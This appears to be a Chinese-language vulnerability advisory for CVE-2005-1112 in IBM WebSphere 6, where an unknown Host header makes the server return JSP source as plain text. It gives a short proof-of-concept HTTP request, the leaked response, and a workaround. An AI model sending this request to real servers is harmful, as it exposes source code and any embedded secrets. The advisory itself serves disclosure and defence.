IBM WebSphere配置JSP泄漏漏洞
发布日期:2005-04-14
更新日期:2005-04-14
受影响系统:IBM Websphere Application Server 6
描述:
CVE(CAN) ID:
CVE-2005-1112
IBM Websphere应用服务器以基于Java和Servlet引擎为基础,支持多种HTTP服务,可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。
在Web server的文档主目录中共享App Server文档主目录的方法存在漏洞,可能导致Web Server以明文存储JSP源码。
插件中有一组用于判断app server是否应处理特定请求的规则。如果流入的请求无法匹配这些规则,则插件就会向web server返回控制以便由web server实现这些请求。在这种情况下,未知的主机首部会导致插件向web server返回控制,因为规则没有指示由app server处理。因此,web server会在web server文档主目录中寻找请求。由于jsp源码存储在web server的文档主目录中,因此web server可以找到文件并以明文存储。
<*来源:SPI Labs (
spilabs@spidynamics.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111342594129109&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
HTTP request sent
-----------------
GET /index.jsp HTTP/1.0
Host: NonExistentHost
HTTP response received
----------------------
HTTP/1.1 200 OK
Via: HTTP/1.1 websphereserver (IBM-PROXY)
Date: Wed, 09 Mar 2005 21:39:43 GMT
Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix)
Last-Modified: Tue, 01 Mar 2005 18:35:02 GMT
ETag: "515e0007-1d72-4224b5d6"
Accept-Ranges: bytes
Content-Length: 7538
Content-Type: text/plain
<%@ include file="/main/inc/alt-header-0.inc" %>
<%@ include file="includes/tabincv4.jsp" %>
<%@ include file="includes/tactic.jsp" %>
<%=headerjs%>
<jsp:include page="<%=tabhdrinc %>" flush="true"/>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 从Web Server文档主目录中删除App Aerver JSP源码。
厂商补丁:
IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ers.ibm.com/浏览次数:2959
严重程度:0(网友投票)